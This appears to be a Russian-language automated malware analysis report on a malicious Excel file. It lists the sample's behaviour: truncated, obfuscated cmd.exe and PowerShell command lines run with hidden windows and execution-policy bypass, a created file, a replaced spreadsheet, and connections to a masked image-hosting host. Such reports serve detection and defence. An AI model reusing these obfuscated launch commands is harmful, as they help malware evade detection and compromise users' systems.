Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "ecHO/ sV UX8 ([TYpE]("{1}{0}"-f'aTh','M') ) ; seT E8CI3 ([TyPe]("{1}{4}{0}{5}{2}{3}"-F't','SYst','t','.EnCoDInG','Em.','eX') ) ; ^^^&("{1}{0}"-f 'l','sa') ('a') ("{0}{2}{1}" -f 'New-Ob'...
Изменения в файловой системе
Создает следующие файлы
- <Текущая директория>\f6031000
Подменяет следующие файлы
- <PATH_SAMPLE>.xls
Сетевая активность
Подключается к
- 'im####2.imgbox.com':443
TCP
Другие
- 'im####2.imgbox.com':443
UDP
- DNS ASK im####2.imgbox.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "ecHO/ sV UX8 ([TYpE]("{1}{0}"-f'aTh','M') ) ; seT E8CI3 ([TyPe]("{1}{4}{0}{5}{2}{3}"-F't','SYst','t','.EnCoDInG','Em.','eX') ) ; ^^^&("{1}{0}"-f 'l','sa') ('a') ("{0}{2}{1}" -f 'New-Ob'...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" ecHO/ sV UX8 ([TYpE]("{1}{0}"-f'aTh','M') ) ; seT E8CI3 ([TyPe]("{1}{4}{0}{5}{2}{3}"-F't','SYst','t','.EnCoDInG','Em.','eX') ) ; ^&("{1}{0}"-f 'l','sa') ('a') ("{0}{2}{1}" -f 'New-O...
- '<SYSTEM32>\clip.exe'
- '<SYSTEM32>\cmd.exe' /cpOWeRSHeLl -NOl -nOnInT -wiNdoWST HIDdeN -exeCUTIoNpOLi bypasS -nOpr -STa [Void][System.Reflection.Assembly]::( \"{2}{1}{4}{0}{5}{3}\" -f'alN',( \"{1}{0}\" -f'thP','oadWi' ),'L','e',( \"...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NOl -nOnInT -wiNdoWST HIDdeN -exeCUTIoNpOLi bypasS -nOpr -STa [Void][System.Reflection.Assembly]::( \"{2}{1}{4}{0}{5}{3}\" -f'alN',( \"{1}{0}\" -f'thP','oadWi' ),'L','e',( \"{0}{1}\"-f'ar...
